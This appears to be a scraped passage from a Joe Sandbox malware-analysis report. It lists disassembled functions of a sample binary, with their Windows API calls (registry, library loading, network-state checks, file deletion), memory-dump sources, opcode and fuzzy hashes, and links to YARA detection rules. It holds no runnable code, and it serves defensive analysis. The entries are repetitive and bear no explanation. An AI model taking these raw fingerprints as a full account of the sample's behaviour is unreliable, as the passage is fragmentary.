Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: DrawGdipImageRect
String ID:
API String ID: 2615643336-0
Opcode ID: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
Instruction ID: 825b5352df1cab7fa619b57a0c75b48649b767bc445dadfc313672210cd53cc9
Opcode Fuzzy Hash: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
Instruction Fuzzy Hash: 16E01232104209AF9F118F95CD00CE77BE9AB14750B044426BE06C6635D672DC20ABE1

Function 00A92982 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00A929C2

Part of subcall function 00AF4656: RaiseException.KERNEL32(?,?,?,00A780B1,?,?,?,?,?,00A780B1,00B4F5B8,00B4F5B8), ref: 00AF4698

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ExceptionException@8RaiseThrow
String ID:
API String ID: 3976011213-0
Opcode ID: fc69c647cbd38ac5d84fb05bab3a88d07fefe2bbbba06b50be3f4e2b4d8d7aa9
Instruction ID: b3003d2dc2e137915655b226eb32ea3373ade2791cca8661888a8996a9e3dc31
Opcode Fuzzy Hash: fc69c647cbd38ac5d84fb05bab3a88d07fefe2bbbba06b50be3f4e2b4d8d7aa9
Instruction Fuzzy Hash: DEE0923250021EBACF20AF85D902FE5B7D8AF14360F00803AFD9C86251E6B0A594CB91

Function 00AA91EB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00AA9202

Part of subcall function 00A8B9B4: __EH_prolog3.LIBCMT ref: 00A8B9BB

Part of subcall function 00AE5385: __EH_prolog3.LIBCMT ref: 00AE538C

Part of subcall function 00AA8C9F: __EH_prolog3.LIBCMT ref: 00AA8CA6
Part of subcall function 00AA8C9F: InterlockedExchange.KERNEL32(?,00003001), ref: 00AA8E38

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3$CountExchangeInterlockedTick
String ID:
API String ID: 364811452-0
Opcode ID: de082291bfe5ea8f23caed489aae4541d0764d8aff660fed5ddb4fc3a9e6ad1c
Instruction ID: 6c6301e25f426fe153060f1dbc906e1899aa08eb198c085f0ff8a425810497ed
Opcode Fuzzy Hash: de082291bfe5ea8f23caed489aae4541d0764d8aff660fed5ddb4fc3a9e6ad1c
Instruction Fuzzy Hash: ABE065315046A1AEFF21AB70E5193EF32D46B66315F00481AF0D5470C1CFF848898652

Function 00A8898E Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00A889A8

Part of subcall function 00A826C0: RegCloseKey.ADVAPI32 ref: 00A826CC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 363e9bc04c3d95788d94627fce8743c9776b1a34158c4bf357ae678a8552f346
Instruction ID: 28ee24361b2a38d9e986de96c7897e324ed6b3cbc3d838d404af02519cc1ba74
Opcode Fuzzy Hash: 363e9bc04c3d95788d94627fce8743c9776b1a34158c4bf357ae678a8552f346
Instruction Fuzzy Hash: 20E04F72100218FBDF14AF40CD02FAE77ADEB44314F104418F801A7250EB75AF10DBA4

Function 00AA5909 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?,?,00A99E1B,?,?,?), ref: 00AA5914

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 2dc9d405d12e5e13a681684ee01dde01c51c5ad9a29a14e631217479a5717c3b
Instruction ID: 1cb32d8053161008199ac14a6f3531a6b02d7a2c978b58751b61fec37df2fd0f
Opcode Fuzzy Hash: 2dc9d405d12e5e13a681684ee01dde01c51c5ad9a29a14e631217479a5717c3b
Instruction Fuzzy Hash: 62E0C232D21E22EAD75067318D00AEB27D86F17360F004825F856C3190E724C901C6AC

Function 6C698189 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,?,6C6943D3,00000001,?,?,?,6C69454C,?,?,?,6C6D5448,0000000C,6C694607), ref: 6C69819E

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1c0886a514dd0f49e86f1ef068d40e3f84950620f00e961d2b90b17e9196ba1d
Instruction ID: 2b19c0c94e503839d920ac74e09441db4de099fe1e982659c05adc7e41829f95
Opcode Fuzzy Hash: 1c0886a514dd0f49e86f1ef068d40e3f84950620f00e961d2b90b17e9196ba1d
Instruction Fuzzy Hash: A1D0A7B27943055EEF009F72AC08B623BFCE38979AF04443AB90CC6540FB70C550D604

Function 00AE0460 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00AA8D06,?,?,.dir,?), ref: 00AE047E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 26115bbd06b42f8a6e6791ea6e7384b3723c9e547824d1bbac83c88e3761b40f
Instruction ID: 9b3f38ec53513a5f5bde6db4448a378d6a0a6a8d82c46bb269949a6897e95de6
Opcode Fuzzy Hash: 26115bbd06b42f8a6e6791ea6e7384b3723c9e547824d1bbac83c88e3761b40f
Instruction Fuzzy Hash: 4DD05E36218212AFE724EB2DF800C9777E8EF89271711485EF8C0C7260DA31ECC18A40

Function 00AD895E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

InternetGetConnectedState.WININET(00A8BB49,00000000), ref: 00AD8968

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ConnectedInternetState
String ID:
API String ID: 97057780-0
Opcode ID: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
Instruction ID: d63cd3957dd503e882a137752f8e1c66450cca275cb7f0c7fcec7ac015acdac6
Opcode Fuzzy Hash: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
Instruction Fuzzy Hash: 1FD0A711A1020875EB029361CD0AB6E36DC4B0064CF4400A59453E31D0EEA8D904D2A1

Function 00A7E4F0 Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00A7E50C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 77b0fa71c9e08538a0ec324171ae2c92d64ef92b21ef8a921b75a91ec5fe23dc
Instruction ID: 428321aeeda2c9516ccf664d277849c13f3ba6603b4324a292583c35c9256f0e
Opcode Fuzzy Hash: 77b0fa71c9e08538a0ec324171ae2c92d64ef92b21ef8a921b75a91ec5fe23dc
Instruction Fuzzy Hash: 80D0127324222075E525A3546C0EFCB934CDF6977AF30C467F706A60C0ABB0652146AD

Function 00AB6817 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

InternetGetConnectedState.WININET(?,00000000), ref: 00AB6821

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ConnectedInternetState
String ID:
API String ID: 97057780-0
Opcode ID: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
Instruction ID: b1b6fb77172e1f88b6fe89c35d11a8bb928eda9f66bab450a62e29c7155cacd5
Opcode Fuzzy Hash: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
Instruction Fuzzy Hash: 71D0C711A1434875DB1197A59E0ABDB76DC9F0164CF1404746511D10C2EEA8D945D291

Function 6C5ED558 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45cdfdfc69a49756c9f584941d2135743586c45e4dc68a35265639c0e73eb094
Instruction ID: f9b2fc2845841eab3806b7f1cf47cca720036aff056d2e481001d29434b9b2e4
Opcode Fuzzy Hash: 45cdfdfc69a49756c9f584941d2135743586c45e4dc68a35265639c0e73eb094
Instruction Fuzzy Hash: 76D05EB15081108EEB408E65FC487C233A8EB80319F5444A9F440DA101E3325882C684

Function 00ACCF63 Relevance: 1.5, APIs: 1, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5083a290a263e700e36547145616b684de532ba0edb80cf291996e1fcf5d21b1
Instruction ID: 38ee75111b15e77e86dc8e07b80ce8ec154be56a55cc43eef2586bff6c0d1ca5
Opcode Fuzzy Hash: 5083a290a263e700e36547145616b684de532ba0edb80cf291996e1fcf5d21b1
Instruction Fuzzy Hash: 59D05EB11042108EDB104F64BC08BC27399FB41316F5144BDE444C6000E33298829680

Function 00ADD478 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ADD47F

Part of subcall function 00AE2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE

Part of subcall function 00AE44E3: __EH_prolog3.LIBCMT ref: 00AE44EA

Part of subcall function 00AE20FB: DeleteCriticalSection.KERNEL32(?,?,00000000,00ADEB0B,?,?,?,00100000,00000000,0000008C), ref: 00AE210D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CriticalH_prolog3Section$DeleteInitialize
String ID:
API String ID: 950624297-0
Opcode ID: ab01291c5dffa5c2a309aa363bcd1cadbbf95488d73a5bab1f791471a9c64ab9
Instruction ID: 3bab83abd8dddcfd6316a71a019cc4909f64d20567d4bc9ba0b4e06dd709eb80
Opcode Fuzzy Hash: ab01291c5dffa5c2a309aa363bcd1cadbbf95488d73a5bab1f791471a9c64ab9
Instruction Fuzzy Hash: 7AE0EC359005589BCB15EBF4CA52BDCB775AF10311F608254F212AB1D5DF385F49DB48

Function 00ABB42A Relevance: 1.5, APIs: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

GdipBitmapLockBits.GDIPLUS(?,?,?,?,?), ref: 00ABB440

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: BitmapBitsGdipLock
String ID:
API String ID: 2574020740-0
Opcode ID: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
Instruction ID: e3a569d9a302a58c84f9af96e538266d5baa1cc351a09a73523176dda0765f47
Opcode Fuzzy Hash: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
Instruction Fuzzy Hash: C1D09E32018616AE9B219F51EF01897BAE6EF44750F004C19B99661526D7A1DC24EB73

Function 00A8DEB6 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00A8DEBA

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 361a970fadd43ff9dca62f3543a01c3a01cdcdec2138553d44149098f840ac18
Instruction ID: d6cdd2c4388fc03083d7bad2afadf89abe2d47a10488ff8514d33195b3963402
Opcode Fuzzy Hash: 361a970fadd43ff9dca62f3543a01c3a01cdcdec2138553d44149098f840ac18
Instruction Fuzzy Hash: D9C08C32221000074E5026359D020A633D1DA52B32FA04F54F0A1C70E5CB20880A2A00

Function 00ACD206 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,0000066D,?,00000000), ref: 00ACD22B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d3cb3b71712a411933440ebb91b7b23fbf7b4572a6312cf7da4254ff615ea902
Instruction ID: 95cfd6a714bdd93f0fec7f31ce5114a155d434c28d6b37516c41e6dab6cb7660
Opcode Fuzzy Hash: d3cb3b71712a411933440ebb91b7b23fbf7b4572a6312cf7da4254ff615ea902
Instruction Fuzzy Hash: C6D0C970A40300EFE7108B82DD09F227BA5B75070AF008169F5099B0A0C7B79C61DB15

Function 00ACD207 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,0000066D,?,00000000), ref: 00ACD22B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7d9cb7b41752f2613b7ebaf3cae0a1994351a303bbcd043a078d17ee4494ceb0
Instruction ID: 8fee94f93120da89439990a733717ce2e37b4c176650d84356a04fd6a8d0f547
Opcode Fuzzy Hash: 7d9cb7b41752f2613b7ebaf3cae0a1994351a303bbcd043a078d17ee4494ceb0
Instruction Fuzzy Hash: F2D0C9B1A04300AFE7008F51DD05F297FA5AB61709F108099F9499A0A1D7B7D821D716

Function 00AE6B56 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000002,00AA8D5A,00000000,?,00AE6919,FFFFFEE2,00000002,?,00000000,00000000,00000748,00AE6A2D,?,00000000,00000000), ref: 00AE6B71

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3db23da3a5e2015eb198254020c05138d5aa4751543f8d722f030ccfe44b8372
Instruction ID: 0ff4d3e2c13ac8f5781121333e51343b9328d954b5e14ae905b48d53365b8996
Opcode Fuzzy Hash: 3db23da3a5e2015eb198254020c05138d5aa4751543f8d722f030ccfe44b8372
Instruction Fuzzy Hash: 49C01231444240BADA115B22CD01F5D7F717B607A4F10CE14B174D60F0DB32C4219705

Function 6C6923D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 6C6923DE

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
